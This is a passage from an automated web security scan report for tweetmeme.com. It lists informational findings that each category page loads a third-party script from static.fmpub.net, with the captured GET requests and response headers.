<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Edu
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.380. http://tweetmeme.com/category/lifestyle-events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-events

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-events HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:26:18 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0086851119995117
X-Served-In: 0.57426810264587
X-Served-By: ded2059
Content-Length: 54486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Eve
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.381. http://tweetmeme.com/category/lifestyle-fooddrink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-fooddrink

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-fooddrink HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044460296630859
X-Served-In: 1.2629458904266
X-Served-By: h00
Content-Length: 53613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Foo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.382. http://tweetmeme.com/category/lifestyle-health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-health

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-health HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:10 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0039830207824707
X-Served-In: 0.049233913421631
X-Served-By: h01
Content-Length: 54626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Hea
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.383. http://tweetmeme.com/category/lifestyle-travelplaces previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/lifestyle-travelplaces

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/lifestyle-travelplaces HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:27:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038809776306152
X-Served-In: 2.3244588375092
X-Served-By: ded2060
Content-Length: 55377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Tra
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.384. http://tweetmeme.com/category/science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/science

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/science HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:28:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0070600509643555
X-Served-In: 0.056226015090942
X-Served-By: ded2059
Content-Length: 55531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Sci
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.385. http://tweetmeme.com/category/science-enviroment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/science-enviroment

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/science-enviroment HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:00 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048539638519287
X-Served-In: 0.05054497718811
X-Served-By: ded2059
Content-Length: 55625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Env
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.386. http://tweetmeme.com/category/science-space previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/science-space

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/science-space HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0040388107299805
X-Served-In: 0.050357818603516
X-Served-By: h04
Content-Length: 54977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Spa
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.387. http://tweetmeme.com/category/sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:27 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042898654937744
X-Served-In: 0.050817966461182
X-Served-By: ded2061
Content-Length: 55565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Spo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.388. http://tweetmeme.com/category/sports-baseball previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-baseball

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-baseball HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:33 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052142143249512
X-Served-In: 0.096256017684937
X-Served-By: ded2061
Content-Length: 56296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Bas
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.389. http://tweetmeme.com/category/sports-basketball previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-basketball

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-basketball HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:30:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038409233093262
X-Served-In: 0.04440712928772
X-Served-By: h01
Content-Length: 54409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Bas
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.390. http://tweetmeme.com/category/sports-extreme previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-extreme

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-extreme HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0092470645904541
X-Served-In: 0.58585095405579
X-Served-By: ded2062
Content-Length: 36970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ext
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.391. http://tweetmeme.com/category/sports-golf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-golf

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-golf HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043578147888184
X-Served-In: 0.054213047027588
X-Served-By: ded2060
Content-Length: 56103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Gol
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.392. http://tweetmeme.com/category/sports-hockey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-hockey

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-hockey HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:16 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033860206604004
X-Served-In: 1.6830840110779
X-Served-By: h03
Content-Length: 56885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Hoc
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.393. http://tweetmeme.com/category/sports-motorsports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-motorsports

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-motorsports HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045862197875977
X-Served-In: 0.44986295700073
X-Served-By: ded2059
Content-Length: 54144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Mot
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.394. http://tweetmeme.com/category/sports-olympics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-olympics

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-olympics HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048768520355225
X-Served-In: 0.42826700210571
X-Served-By: h03
Content-Length: 52629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Oly
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.395. http://tweetmeme.com/category/sports-soccer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-soccer

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-soccer HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:31:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034091472625732
X-Served-In: 0.051372051239014
X-Served-By: h00
Content-Length: 55638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Soc
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.396. http://tweetmeme.com/category/sports-tennis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/sports-tennis

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /category/sports-tennis HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:32:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033609867095947
X-Served-In: 0.5688591003418
X-Served-By: ded2059
Content-Length: 45901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ten
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.397. http://tweetmeme.com/category/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/category/technology

Issue detail

